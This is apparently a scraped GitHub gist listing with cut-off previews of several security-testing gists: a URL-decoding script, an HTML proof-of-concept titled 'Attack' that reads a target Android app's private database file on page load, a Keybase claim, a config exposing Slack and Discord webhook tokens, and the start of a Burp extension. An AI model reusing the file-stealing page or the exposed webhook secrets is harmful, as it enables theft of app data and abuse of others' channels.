#! /usr/bin/env python3
import sys
import os
# print(os.system('ls'))
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /usr/bin/env python3 | |
import os | |
import urllib.parse as ul | |
import sys | |
for line in sys.stdin.readlines(): | |
decode = ul.unquote(str(line)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body onload="doAttack()"> | |
<h1>Attack</h1> | |
<script> | |
// file path to steal | |
var target "file:///data/data/com.target.app/databases/target.db"; | |
= | |
// get the contents of the target file by XHR | |
function doAttack() { | |
var xhr1 = new XMLHttpRequest(); |
I hereby claim:
- I am balook on github.
- I am balook (https://keybase.io/balook) on keybase.
- I have a public key ASDoqBsHBUtytqNwL0Zq3T_4OJKk3B9w19MieIRkvkLc0Qo
To claim this, I am signing this object:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
burp_biid: "123456798" | |
slack_webhook_url: https://hooks.slack.com/services/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 | |
slack_username: prob | |
slack_channel: alert | |
slack: true | |
discord_webhook_url: https://discord.com/api/webhooks/763657778480414721/lZyZIbTFP9ZtL_0nPrUS9fGtsf-D4xPgCv_ESp4Olv4jMrCjv3YS608WIPJHxh-sxc8F | |
discord_username: fucker |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import json | |
import sys | |
from java.io import PrintWriter | |
from burp import IBurpExtender | |
from burp import IHttpRequestResponse | |
from burp import IHttpService | |
from burp import ISessionHandlingAction | |
import re | |
#Regex for extracting value of the token from the HTML Body |
OlderNewer